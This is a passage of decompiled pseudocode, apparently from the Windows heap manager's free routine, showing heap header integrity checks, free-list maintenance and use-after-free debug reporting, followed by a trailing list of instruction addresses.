																			__eflags = _t1309;
																			_v184 = _t1309;
																		}
																	}
																	_t903 = E1D7980A0(_t1019 + 0x10, _t1309, 0xfeeefeee);
																	_v72 = _t903;
																	__eflags = _t903 - _t1309;
																	if(_t903 != _t1309) {
																		_t1114 =  *[fs:0x30];
																		__eflags =  *(_t1114 + 0xc);
																		if( *(_t1114 + 0xc) == 0) {
																			_push("HEAP: ");
																			E1D73B910();
																			_t1327 = _t1324 + 4;
																		} else {
																			E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																			_t1327 = _t1324 + 8;
																		}
																		_push(_v72 + 0x10 + _t1019);
																		E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1019);
																		_t1324 = _t1327 + 0xc;
																		_t909 =  *[fs:0x30];
																		__eflags =  *((char*)(_t909 + 2));
																		if( *((char*)(_t909 + 2)) != 0) {
																			 *0x1d8347a1 = 1;
																			 *0x1d834100 = _t1019;
																			asm("int3");
																			 *0x1d8347a1 = 0;
																		}
																	}
																}
															} else {
																_t913 = E1D73F5C7(_t1280, _t1019);
																__eflags = _t913;
																if(_t913 != 0) {
																	goto L129;
																} else {
																	E1D73F113(_t1280, _t1019,  *_t1019 & 0x0000ffff, 1);
																}
															}
														}
													}
													_v60 = 0;
													_t1286 = _v36;
												}
												_t299 = _t1286 + 8; // 0x106
												_t1224 = _t299;
												_v72 = _t1224;
												_t1088 =  *_t1224;
												_v104 = _t1088;
												_t854 =  *(_t1286 + 0xc);
												_v128 = _t854;
												_t855 =  *_t854;
												_t1089 =  *((intOrPtr*)(_t1088 + 4));
												__eflags = _t855 - _t1089;
												if(_t855 != _t1089) {
													L191:
													E1D805FED(0xd, _t1280, _t1224, _t1089, _t855, 0);
													goto L192;
												} else {
													__eflags = _t855 - _t1224;
													if(_t855 != _t1224) {
														goto L191;
													} else {
														 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1286 & 0x0000ffff);
														_t1091 =  *(_t1280 + 0xb4);
														_v32 = _t1091;
														__eflags = _t1091;
														if(_t1091 != 0) {
															_t878 =  *_t1286 & 0x0000ffff;
															_v80 = _t878;
															while(1) {
																_t1302 =  *(_t1091 + 4);
																__eflags = _t878 - _t1302;
																if(_t878 < _t1302) {
																	break;
																}
																_t879 =  *_t1091;
																__eflags = _t879;
																if(_t879 != 0) {
																	_t1091 = _t879;
																	_v32 = _t1091;
																	_t878 = _v80;
																	continue;
																} else {
																	_t1303 = _t1302 - 1;
																	__eflags = _t1303;
																	_v124 = _t1303;
																}
																L149:
																_v56 = _t1303;
																_t1238 = _t1303 -  *((intOrPtr*)(_t1091 + 0x14));
																_v44 = _t1238;
																__eflags =  *(_t1091 + 8);
																_t880 = _t1238 + _t1238;
																if( *(_t1091 + 8) == 0) {
																	_t880 = _t1238;
																}
																_t1239 = _t880 * 4;
																_v84 = _t1239;
																_t882 =  *((intOrPtr*)(_t1091 + 0x20)) + _t1239;
																_v52 = _t882;
																_v96 =  *_t882;
																 *((intOrPtr*)(_t1091 + 0xc)) =  *((intOrPtr*)(_t1091 + 0xc)) - 1;
																_t884 =  *(_t1091 + 4);
																_t1240 = _t884 - 1;
																_v120 = _t1240;
																__eflags = _t1303 - _t1240;
																if(_t1303 == _t1240) {
																	_t328 = _t1091 + 0x10;
																	 *_t328 =  *(_t1091 + 0x10) - 1;
																	__eflags =  *_t328;
																}
																_t1304 = _v72;
																__eflags = _v96 - _t1304;
																if(_v96 == _t1304) {
																	_v192 = _t884;
																	__eflags =  *_t1091;
																	if( *_t1091 == 0) {
																		_t884 = _v120;
																		_v192 = _t884;
																	}
																	_t1305 =  *_t1304;
																	_v72 =  *((intOrPtr*)(_t1091 + 0x18));
																	__eflags = _v56 - _t884;
																	_t1242 = _v44;
																	if(_v56 >= _t884) {
																		_t885 = _v52;
																		__eflags = _t1305 - _v72;
																		if(_t1305 == _v72) {
																			 *_t885 = 0;
																			goto L170;
																		} else {
																			 *_t885 = _t1305;
																			goto L164;
																		}
																		goto L187;
																	} else {
																		__eflags = _t1305 -  *((intOrPtr*)(_t1091 + 0x18));
																		if(_t1305 ==  *((intOrPtr*)(_t1091 + 0x18))) {
																			L169:
																			 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = 0;
																			L170:
																			_v44 = _t1242 & 0x0000001f;
																			 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1242 >> 5) * 4) &  !(1 << _v44);
																		} else {
																			_t1247 =  *(_t1305 - 8);
																			_v292 = _t1247;
																			__eflags =  *(_t1280 + 0x4c);
																			if( *(_t1280 + 0x4c) != 0) {
																				_t1247 = _t1247 ^  *(_t1280 + 0x50);
																				_v72 = _t1247;
																				_v292 = _t1247;
																				__eflags = _t1247 >> 0x18 - (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247);
																				if(_t1247 >> 0x18 != (_t1247 >> 0x00000010 ^ _t1247 >> 0x00000008 ^ _t1247)) {
																					E1D805FED(3, _t1280, _t1305 - 8, 0, 0, 0);
																					_t1247 = _v72;
																				}
																				_t1091 = _v32;
																			}
																			_t1249 = _v80 - (_t1247 & 0x0000ffff);
																			__eflags = _t1249;
																			_v240 = _t1249;
																			if(_t1249 != 0) {
																				_t1242 = _v44;
																				goto L169;
																			} else {
																				 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = _t1305;
																			}
																		}
																	}
																}
																L164:
																_t1286 = _v36;
																goto L165;
															}
															_v124 = _t878;
															_t1303 = _t878;
															goto L149;
														}
														L165:
														_t858 = _v104;
														_t1092 = _v128;
														 *_t1092 = _t858;
														_t858[2] = _t1092;
														__eflags =  *(_t1286 + 2) & 0x00000008;
														if(( *(_t1286 + 2) & 0x00000008) == 0) {
															L175:
															_t1093 =  *(_t1286 + 2);
															__eflags = _t1093 & 0x00000004;
															if((_t1093 & 0x00000004) != 0) {
																_t1301 = ( *_t1286 & 0x0000ffff) * 8 - 0x10;
																_v196 = _t1301;
																__eflags = _t1093 & 0x00000002;
																if((_t1093 & 0x00000002) != 0) {
																	__eflags = _t1301 - 4;
																	if(_t1301 > 4) {
																		_t1301 = _t1301 - 4;
																		__eflags = _t1301;
																		_v196 = _t1301;
																	}
																}
																_t865 = E1D7980A0(_v36 + 0x10, _t1301, 0xfeeefeee);
																_v72 = _t865;
																__eflags = _t865 - _t1301;
																if(_t865 == _t1301) {
																	_t1286 = _v36;
																} else {
																	_t1097 =  *[fs:0x30];
																	__eflags =  *(_t1097 + 0xc);
																	if( *(_t1097 + 0xc) == 0) {
																		_push("HEAP: ");
																		E1D73B910();
																	} else {
																		E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_t1286 = _v36;
																	_push(_v72 + 0x10 + _t1286);
																	E1D73B910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1286);
																	_t871 =  *[fs:0x30];
																	__eflags =  *((char*)(_t871 + 2));
																	if( *((char*)(_t871 + 2)) != 0) {
																		 *0x1d8347a1 = 1;
																		 *0x1d834100 = _t1286;
																		asm("int3");
																		 *0x1d8347a1 = 0;
																	}
																}
															}
															 *(_t1019 + 2) = 0;
															 *((char*)(_t1019 + 7)) = 0;
															_t1095 = _v48 + ( *_t1286 & 0x0000ffff);
															_v48 = _t1095;
															 *_t1019 = _t1095;
															_t1096 = _v48;
															_t861 =  *(_t1280 + 0x54) ^ _t1096;
															__eflags = _t861;
															 *(_t1019 + 4 + _t1096 * 8) = _t861;
															_t1195 = _v48;
														} else {
															_t875 = E1D73F5C7(_t1280, _t1286);
															__eflags = _t875;
															if(_t875 != 0) {
																goto L175;
															} else {
																E1D73F113(_t1280, _t1286,  *_t1286 & 0x0000ffff, 1);
																L192:
																_t1195 = _v48;
																continue;
															}
														}
													}
												}
												break;
											}
											L187:
											_a4 = _t1019;
											goto L188;
										}
									}
									goto L112;
								}
								L188:
								__eflags = _t1195 -  *((intOrPtr*)(_t1280 + 0x6c));
								if(_t1195 <  *((intOrPtr*)(_t1280 + 0x6c))) {
									L193:
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <=  *((intOrPtr*)(_t1280 + 0x70))) {
										L197:
										__eflags = _t1195 - 0xfe00;
										if(_t1195 > 0xfe00) {
											_t1196 = _t1019;
											_t1045 = _t1280;
											E1D750B10(_t1045, _t1196, _t1195);
										} else {
											__eflags = _v37;
											if(_v37 == 0) {
												_t1291 = _t1195 & 0x0000ffff;
												 *(_t1019 + 2) =  *(_t1019 + 2) & 0x000000f0;
												 *((char*)(_t1019 + 7)) = 0;
												__eflags =  *(_t1280 + 0x40) & 0x00000040;
												if(( *(_t1280 + 0x40) & 0x00000040) != 0) {
													E1D798140(_t1019 + 0x10, _t1291 * 8 - 0x10, 0xfeeefeee);
													_t577 = _t1019 + 2;
													 *_t577 =  *(_t1019 + 2) | 0x00000004;
													__eflags =  *_t577;
												}
												_t760 = _t1280 + 0xc0;
												__eflags =  *(_t1280 + 0xb4);
												if( *(_t1280 + 0xb4) == 0) {
													_t1199 =  *_t760;
												} else {
													_t1199 = E1D741C0E(_t1280, _t1291);
													_t760 = _t1280 + 0xc0;
												}
												while(1) {
													__eflags = _t760 - _t1199;
													if(_t760 == _t1199) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1051 =  *(_t1199 - 8);
														_v110 = _t1051;
													} else {
														_t1051 =  *(_t1199 - 8);
														_v100 = _t1051;
														__eflags =  *(_t1280 + 0x4c) & _t1051;
														if(( *(_t1280 + 0x4c) & _t1051) != 0) {
															_t1051 = _t1051 ^  *(_t1280 + 0x50);
															__eflags = _t1051;
															_v100 = _t1051;
														}
														_v110 = _t1051;
														_t1019 = _a4;
													}
													__eflags = _t1291 - (_t1051 & 0x0000ffff);
													if(_t1291 > (_t1051 & 0x0000ffff)) {
														_t1199 =  *_t1199;
														_t760 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t761 = _t1019 + 8;
												_t1045 =  *(_t1199 + 4);
												_t1286 =  *_t1045;
												__eflags = _t1286 - _t1199;
												if(_t1286 != _t1199) {
													__eflags = 0;
													_t1045 = 0xd;
													E1D805FED(0xd, 0, _t1199, 0, _t1286, 0);
												} else {
													 *_t761 = _t1199;
													 *(_t761 + 4) = _t1045;
													 *_t1045 = _t761;
													 *(_t1199 + 4) = _t761;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1196 =  *(_t1280 + 0xb4);
												__eflags = _t1196;
												if(_t1196 != 0) {
													_t1050 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t768 =  *(_t1196 + 4);
														__eflags = _t1050 - _t768;
														if(_t1050 < _t768) {
															break;
														}
														_t1286 =  *_t1196;
														__eflags = _t1286;
														if(_t1286 != 0) {
															_t1196 = _t1286;
															continue;
														} else {
															_t1050 = _t768 - 1;
														}
														break;
													}
													_v208 = _t1050;
													_t1045 = _t1280;
													E1D741B5D(_t1045, _t1196, 1, _t1019 + 8, _t1050,  *_t1019 & 0x0000ffff);
												}
											} else {
												_t777 = _t1195 & 0x0000ffff;
												_v32 = _t777;
												 *(_t1019 + 2) = 0;
												 *((char*)(_t1019 + 7)) = 0;
												_t1202 = _t1280 + 0xc0;
												_t1292 =  *(_t1280 + 0xb4);
												_v44 = _t1292;
												__eflags = _t1292;
												if(_t1292 == 0) {
													_t1053 =  *_t1202;
												} else {
													while(1) {
														_t1056 =  *((intOrPtr*)(_t1292 + 4));
														__eflags = _t777 - _t1056;
														if(_t777 < _t1056) {
															goto L203;
														}
														_t842 =  *_t1292;
														__eflags = _t842;
														if(_t842 != 0) {
															_t1292 = _t842;
															_v44 = _t1292;
															_t777 = _v32;
															continue;
														} else {
															_t777 = _t1056 - 1;
															while(1) {
																L203:
																_v52 = _t777;
																_v144 = _t777;
																_v36 = _t777 -  *(_t1292 + 0x14);
																_v96 = 0;
																_t1215 =  *(_t1292 + 0x18);
																_v80 = _t1215;
																_t801 =  *((intOrPtr*)(_t1215 + 4));
																__eflags = _t1215 - _t801;
																if(_t1215 != _t801) {
																	goto L205;
																}
																_t1053 = _t1215;
																L244:
																__eflags = _t1053;
																if(_t1053 == 0) {
																	L247:
																	_t1292 =  *_t1292;
																	_v44 = _t1292;
																	_t777 =  *(_t1292 + 0x14);
																	continue;
																}
																_t1202 = _t1280 + 0xc0;
																goto L250;
																L205:
																_t802 = _t801 + 0xfffffff8;
																_v72 = _t802;
																_t1026 =  *_t802;
																_v300 = _t1026;
																__eflags =  *(_t1280 + 0x4c);
																if( *(_t1280 + 0x4c) != 0) {
																	_t1026 = _t1026 ^  *(_t1280 + 0x50);
																	_v300 = _t1026;
																	__eflags = _t1026 >> 0x18 - (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026);
																	if(_t1026 >> 0x18 != (_t1026 >> 0x00000010 ^ _t1026 >> 0x00000008 ^ _t1026)) {
																		E1D805FED(3, _t1280, _v72, 0, 0, 0);
																		_t1215 = _v80;
																	}
																}
																_t1058 = _v32 - (_t1026 & 0x0000ffff);
																_v244 = _t1058;
																__eflags = _t1058;
																if(_t1058 <= 0) {
																	_t805 =  *_t1215 + 0xfffffff8;
																	_v72 = _t805;
																	_t1027 =  *_t805;
																	_v308 = _t1027;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t1027 = _t1027 ^  *(_t1280 + 0x50);
																		_v308 = _t1027;
																		__eflags = _t1027 >> 0x18 - (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027);
																		if(_t1027 >> 0x18 != (_t1027 >> 0x00000010 ^ _t1027 >> 0x00000008 ^ _t1027)) {
																			E1D805FED(3, _t1280, _v72, 0, 0, 0);
																			_t1215 = _v80;
																		}
																	}
																	_t1060 = _v32 - (_t1027 & 0x0000ffff);
																	_v248 = _t1060;
																	__eflags = _t1060;
																	if(_t1060 > 0) {
																		__eflags =  *_t1292;
																		if( *_t1292 != 0) {
																			L228:
																			_t1061 = _v36;
																			_t1217 = _t1061 >> 5;
																			_v124 = ( *((intOrPtr*)(_t1292 + 4)) -  *(_t1292 + 0x14) >> 5) - 1;
																			_t812 =  *((intOrPtr*)(_t1292 + 0x1c)) + _t1217 * 4;
																			_t1030 = (_t1027 | 0xffffffff) << (_t1061 & 0x0000001f) &  *_t812;
																			__eflags = _t1030;
																			_t1063 = _v124;
																			while(1) {
																				_v200 = _t812;
																				_v140 = _t1217;
																				__eflags = _t1030;
																				if(_t1030 != 0) {
																					break;
																				}
																				__eflags = _t1217 - _t1063;
																				if(_t1217 > _t1063) {
																					__eflags = _t1030;
																					if(_t1030 == 0) {
																						_t1019 = _a4;
																						goto L247;
																					} else {
																						break;
																					}
																				} else {
																					_t812 =  &(_t812[1]);
																					_t1030 =  *_t812;
																					_t1217 = _t1217 + 1;
																					continue;
																				}
																				goto L244;
																			}
																			__eflags = _t1030;
																			if(_t1030 == 0) {
																				_t815 = _t1030 >> 0x00000010 & 0x000000ff;
																				__eflags = _t815;
																				if(_t815 == 0) {
																					_t817 = ( *((_t1030 >> 0x18) + 0x1d7189b0) & 0x000000ff) + 0x18;
																					__eflags = _t817;
																				} else {
																					_t817 = ( *(_t815 + 0x1d7189b0) & 0x000000ff) + 0x10;
																				}
																			} else {
																				_t820 = _t1030 & 0x000000ff;
																				__eflags = _t1030;
																				if(_t1030 == 0) {
																					_t817 = ( *((_t1030 >> 0x00000008 & 0x000000ff) + 0x1d7189b0) & 0x000000ff) + 8;
																				} else {
																					_t817 =  *(_t820 + 0x1d7189b0) & 0x000000ff;
																				}
																			}
																			_t1219 = (_t1217 << 5) + _t817;
																			_v140 = _t1219;
																			__eflags =  *(_t1292 + 8);
																			if( *(_t1292 + 8) != 0) {
																				_t1219 = _t1219 + _t1219;
																				__eflags = _t1219;
																			}
																			_t1053 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1219 * 4);
																			goto L243;
																		} else {
																			__eflags = _v52 -  *((intOrPtr*)(_t1292 + 4)) - 1;
																			if(_v52 !=  *((intOrPtr*)(_t1292 + 4)) - 1) {
																				goto L228;
																			} else {
																				_t1069 = _v36;
																				__eflags =  *(_t1292 + 8);
																				if( *(_t1292 + 8) != 0) {
																					_t1069 = _t1069 + _t1069;
																					__eflags = _t1069;
																				}
																				_t1298 =  *( *((intOrPtr*)(_t1292 + 0x20)) + _t1069 * 4);
																				while(1) {
																					__eflags = _t1215 - _t1298;
																					if(_t1215 == _t1298) {
																						break;
																					}
																					_t1220 = _t1298 - 8;
																					_t1033 =  *(_t1298 - 8);
																					_v316 = _t1033;
																					__eflags =  *(_t1280 + 0x4c);
																					if( *(_t1280 + 0x4c) != 0) {
																						_t1033 = _t1033 ^  *(_t1280 + 0x50);
																						_v316 = _t1033;
																						__eflags = _t1033 >> 0x18 - (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033);
																						if(_t1033 >> 0x18 != (_t1033 >> 0x00000010 ^ _t1033 >> 0x00000008 ^ _t1033)) {
																							E1D805FED(3, _t1280, _t1220, 0, 0, 0);
																						}
																					}
																					_t1071 = _v32 - (_t1033 & 0x0000ffff);
																					_v252 = _t1071;
																					__eflags = _t1071;
																					if(_t1071 > 0) {
																						_t1298 =  *_t1298;
																						_t1215 = _v80;
																						continue;
																					} else {
																						_t1053 = _t1298;
																						_t1292 = _v44;
																					}
																					goto L243;
																				}
																				_t1053 = _v96;
																				_t1292 = _v44;
																				goto L243;
																			}
																		}
																	} else {
																		_t1053 =  *_t1215;
																		goto L243;
																	}
																} else {
																	_t1053 = _t1215;
																	L243:
																	_t1019 = _a4;
																}
																goto L244;
															}
														}
														goto L203;
													}
													goto L203;
												}
												L250:
												_t1293 = _v32;
												while(1) {
													__eflags = _t1202 - _t1053;
													if(_t1202 == _t1053) {
														break;
													}
													__eflags =  *(_t1280 + 0x4c);
													if( *(_t1280 + 0x4c) == 0) {
														_t1214 =  *(_t1053 - 8);
														_v108 = _t1214;
													} else {
														_t1214 =  *(_t1053 - 8);
														_v76 = _t1214;
														__eflags =  *(_t1280 + 0x4c) & _t1214;
														if(( *(_t1280 + 0x4c) & _t1214) != 0) {
															_t1214 = _t1214 ^  *(_t1280 + 0x50);
															__eflags = _t1214;
															_v76 = _t1214;
														}
														_v108 = _t1214;
														_t1019 = _a4;
													}
													__eflags = _t1293 - (_t1214 & 0x0000ffff);
													if(_t1293 > (_t1214 & 0x0000ffff)) {
														_t1053 =  *_t1053;
														_t1202 = _t1280 + 0xc0;
														continue;
													}
													break;
												}
												_t1196 = _t1019 + 8;
												_v96 = _t1196;
												_t778 =  *(_t1053 + 4);
												_t1286 =  *_t778;
												__eflags = _t1286 - _t1053;
												if(_t1286 != _t1053) {
													_t1196 = 0;
													__eflags = 0;
													_t513 = _t1196 + 0xd; // 0xd
													E1D805FED(_t513, 0, _t1053, 0, _t1286, 0);
												} else {
													 *_t1196 = _t1053;
													 *(_t1196 + 4) = _t778;
													 *_t778 = _t1196;
													 *(_t1053 + 4) = _t1196;
												}
												 *(_t1280 + 0x74) =  *(_t1280 + 0x74) + ( *_t1019 & 0x0000ffff);
												_t1045 =  *(_t1280 + 0xb4);
												_v52 = _t1045;
												__eflags = _t1045;
												if(_t1045 != 0) {
													_t1294 =  *_t1019 & 0x0000ffff;
													while(1) {
														_t1203 =  *((intOrPtr*)(_t1045 + 4));
														__eflags = _t1294 - _t1203;
														if(_t1294 < _t1203) {
															break;
														}
														_t798 =  *_t1045;
														__eflags = _t798;
														if(_t798 != 0) {
															_t1045 = _t798;
															_v52 = _t1045;
															continue;
														} else {
															_t1294 = _t1203 - 1;
														}
														break;
													}
													_v204 = _t1294;
													_v72 =  *_t1019 & 0x0000ffff;
													_t1205 = _t1294 -  *((intOrPtr*)(_t1045 + 0x14));
													_v32 = _t1205;
													__eflags =  *(_t1045 + 8);
													_t782 = _t1205 + _t1205;
													if( *(_t1045 + 8) == 0) {
														_t782 = _t1205;
													}
													 *((intOrPtr*)(_t1045 + 0xc)) =  *((intOrPtr*)(_t1045 + 0xc)) + 1;
													_v56 = _t782 << 2;
													_v84 =  *((intOrPtr*)(_v56 +  *((intOrPtr*)(_t1045 + 0x20))));
													__eflags = _t1294 -  *((intOrPtr*)(_t1045 + 4)) - 1;
													_t1196 = _v32;
													if(_t1294 ==  *((intOrPtr*)(_t1045 + 4)) - 1) {
														_t535 = _t1045 + 0x10;
														 *_t535 =  *(_t1045 + 0x10) + 1;
														__eflags =  *_t535;
													}
													_t1295 = _v84;
													__eflags = _t1295;
													if(_t1295 == 0) {
														L277:
														_t788 =  *((intOrPtr*)(_t1045 + 0x20));
														_t1045 = _v56;
														 *(_t1045 + _t788) = _v96;
														_t1286 = _v84;
													} else {
														_t1023 =  *(_t1295 - 8);
														_v324 = _t1023;
														__eflags =  *(_t1280 + 0x4c);
														if( *(_t1280 + 0x4c) != 0) {
															_t1023 = _t1023 ^  *(_t1280 + 0x50);
															_v324 = _t1023;
															__eflags = _t1023 >> 0x18 - (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023);
															if(_t1023 >> 0x18 != (_t1023 >> 0x00000010 ^ _t1023 >> 0x00000008 ^ _t1023)) {
																E1D805FED(3, _t1280, _t1295 - 8, 0, 0, 0);
																_t1045 = _v52;
															}
															_t1196 = _v32;
														}
														_t1025 = _v72 - (_t1023 & 0x0000ffff);
														_v256 = _t1025;
														__eflags = _t1025;
														_t1019 = _a4;
														if(_t1025 <= 0) {
															goto L277;
														}
													}
													__eflags = _t1286;
													if(_t1286 == 0) {
														_t1286 = _t1196 >> 5;
														_v32 = _t1196 & 0x0000001f;
														_t1045 = _v32;
														_t1196 = 1 << _t1045;
														_t790 =  *((intOrPtr*)(_v52 + 0x1c));
														_t558 = _t790 + _t1286 * 4;
														 *_t558 =  *(_t790 + _t1286 * 4) | 0x00000001;
														__eflags =  *_t558;
													}
												}
											}
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
											}
										}
										_t1197 = _t1196 | 0xffffffff;
										__eflags = _v64;
										if(_v64 != 0) {
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
												if(__eflags != 0) {
													_push(_t1045);
													_t1197 = _t1019;
													E1D7FD646(_t1019, _t1280, _t1197, _t1280, _t1286, __eflags);
												}
											}
											_t1047 =  *(_t1019 + 2) | 0x00000002;
											 *(_t1019 + 2) = _t1047;
											_t1290 = _t1019 + ( *_t1019 & 0x0000ffff) * 8;
											__eflags =  *(_t1280 + 0x4c);
											if( *(_t1280 + 0x4c) != 0) {
												 *(_t1019 + 3) =  *(_t1019 + 1) ^ _t1047 ^  *_t1019;
												 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
												__eflags =  *_t1019;
											}
											 *((short*)(_t1290 - 4)) = _v64;
											 *((short*)(_t1290 - 2)) = 0;
											__eflags =  *(_t1280 + 0x40) & 0x08000000;
											if(( *(_t1280 + 0x40) & 0x08000000) != 0) {
												 *((short*)(_t1290 - 2)) = E1D76FDB9(1, _t1197);
											}
											goto L315;
										}
									} else {
										__eflags = _t1195 - 0x200;
										if(_t1195 < 0x200) {
											goto L197;
										} else {
											__eflags =  *(_t1280 + 0x54) -  *(_t1019 + 4);
											if( *(_t1280 + 0x54) !=  *(_t1019 + 4)) {
												goto L197;
											} else {
												_t1197 = _t1019;
												E1D73F113(_t1280, _t1197, _t1195, 0);
												_v64 = 0;
												goto L315;
											}
										}
									}
								} else {
									__eflags =  *(_t1280 + 0x74) + _t1195 -  *((intOrPtr*)(_t1280 + 0x70));
									if( *(_t1280 + 0x74) + _t1195 <  *((intOrPtr*)(_t1280 + 0x70))) {
										goto L193;
									} else {
										_t1197 = _t1019;
										E1D73F113(_t1280, _t1197, _t1195, 0);
										L315:
										__eflags = _t1197 | 0xffffffff;
									}
								}
								_t1288 = 0;
								_a4 = 0;
							}
						} else {
							_t1175 =  *(_t1280 + 0xc8);
							_t1191 =  *[fs:0x18];
							asm("lock btr dword [eax], 0x0");
							if(__eflags >= 0) {
								__eflags =  *((intOrPtr*)(_t1175 + 0xc)) -  *((intOrPtr*)(_t1191 + 0x24));
								if( *((intOrPtr*)(_t1175 + 0xc)) !=  *((intOrPtr*)(_t1191 + 0x24))) {
									_v132 = 0;
									__eflags =  *0x1d835da8;
									if( *0x1d835da8 == 0) {
										E1D74FED0( *(_t1280 + 0xc8));
										_t1175 = _t1280;
										E1D779CEB(_t1175, 1);
										goto L24;
									} else {
										_v85 = 0;
										 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000194;
										_t1319 =  *[fs:0x18];
										_v224 = _t1319;
										 *((intOrPtr*)(_t1319 + 0x34)) = E1D76ABA0(0xc0000194);
										_v156 = 0;
										_t1288 = 0;
										_a4 = 0;
										L350:
										__eflags = _t1191 | 0xffffffff;
									}
								} else {
									 *(_t1175 + 8) =  *(_t1175 + 8) + 1;
									_v132 = 1;
									 *((intOrPtr*)(_t1280 + 0x214)) =  *((intOrPtr*)(_t1280 + 0x214)) + 1;
									goto L24;
								}
							} else {
								 *((intOrPtr*)(_t1175 + 0xc)) =  *((intOrPtr*)(_t1191 + 0x24));
								 *(_t1175 + 8) = 1;
								_v132 = 1;
								 *((intOrPtr*)(_t1280 + 0x214)) =  *((intOrPtr*)(_t1280 + 0x214)) + 1;
								L24:
								_v85 = 1;
								_v38 = 1;
								_t1019 = _a4;
								__eflags =  *(_t1280 + 0x4c);
								if( *(_t1280 + 0x4c) != 0) {
									 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
									__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
									if(__eflags != 0) {
										_push(_t1175);
										E1D7FD646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
									}
								}
								_t1176 =  *_t1019 & 0x0000ffff;
								_t998 =  *(_t1280 + 0xb4);
								while(1) {
									_t1318 =  *((intOrPtr*)(_t998 + 4));
									__eflags = _t1176 - _t1318;
									if(_t1176 < _t1318) {
										_v160 = _t1176;
										_t1275 = _t1176;
										break;
									}
									_t1274 =  *_t998;
									__eflags = _t1274;
									if(_t1274 != 0) {
										_t998 = _t1274;
										continue;
									} else {
										_t1275 = _t1318 - 1;
										_v160 = _t1275;
									}
									break;
								}
								__eflags = _t1275 - _t1318;
								if(_t1275 >= _t1318) {
									L37:
									_v136 = 0;
								} else {
									__eflags = _t1176 - _t1275;
									if(_t1176 != _t1275) {
										goto L37;
									} else {
										_t1177 = _t1176 -  *((intOrPtr*)(_t998 + 0x14));
										__eflags =  *(_t998 + 8);
										if( *(_t998 + 8) != 0) {
											_t1177 = _t1177 + _t1177;
											__eflags = _t1177;
										}
										_v136 =  *((intOrPtr*)(_t998 + 0x20)) + _t1177 * 4;
									}
								}
								goto L42;
							}
						}
						_v8 = 0xfffffffe;
						E1D755050(_t1280, _t1288);
						 *[fs:0x0] = _v20;
						return _v156;
					} else {
						_v37 = 0;
						_t1285 = 4;
						__eflags = _t1188 & 0x61000000;
						if((_t1188 & 0x61000000) == 0) {
							goto L7;
						} else {
							__eflags = _t1188 & 0x10000000;
							if(__eflags != 0) {
								goto L7;
							} else {
								_t1015 = E1D7EF8F8(_t1018, __ecx, _t1188, __ecx, 4, __eflags, _a8);
								 *[fs:0x0] = _v20;
								return _t1015;
							}
						}
					}
				} else {
					E1D805FED(9, __ecx, _t690, 0, 0, 0);
					 *[fs:0x0] = _v20;
					return 0;
				}
			}






















































































































































































































































































                                                                                                                              0x1d753c60
                                                                                                                              0x1d753c65
                                                                                                                              0x1d753c67
                                                                                                                              0x1d753c6c
                                                                                                                              0x1d753c77
                                                                                                                              0x1d753c78
                                                                                                                              0x1d753c7e
                                                                                                                              0x1d753c81
                                                                                                                              0x1d753c86
                                                                                                                              0x1d753c8b
                                                                                                                              0x1d753c8f
                                                                                                                              0x1d753c95
                                                                                                                              0x1d753c97
                                                                                                                              0x1d753c9d
                                                                                                                              0x1d753ca1
                                                                                                                              0x1d753ca5
                                                                                                                              0x1d753caf
                                                                                                                              0x1d753cb9
                                                                                                                              0x1d753cc0
                                                                                                                              0x1d753cc7
                                                                                                                              0x1d753cd3
                                                                                                                              0x1d753cd7
                                                                                                                              0x1d753cdc
                                                                                                                              0x1d753d07
                                                                                                                              0x1d753d0a
                                                                                                                              0x1d753d0d
                                                                                                                              0x1d753d13
                                                                                                                              0x1d753d4a
                                                                                                                              0x1d753d4f
                                                                                                                              0x1d753d55
                                                                                                                              0x1d753d58
                                                                                                                              0x1d753d5a
                                                                                                                              0x1d753d71
                                                                                                                              0x1d753d71
                                                                                                                              0x1d753d5c
                                                                                                                              0x1d753d5c
                                                                                                                              0x1d753d5f
                                                                                                                              0x00000000
                                                                                                                              0x1d753d61
                                                                                                                              0x1d753d6a
                                                                                                                              0x1d753d6a
                                                                                                                              0x1d753d5f
                                                                                                                              0x1d753d76
                                                                                                                              0x1d753d79
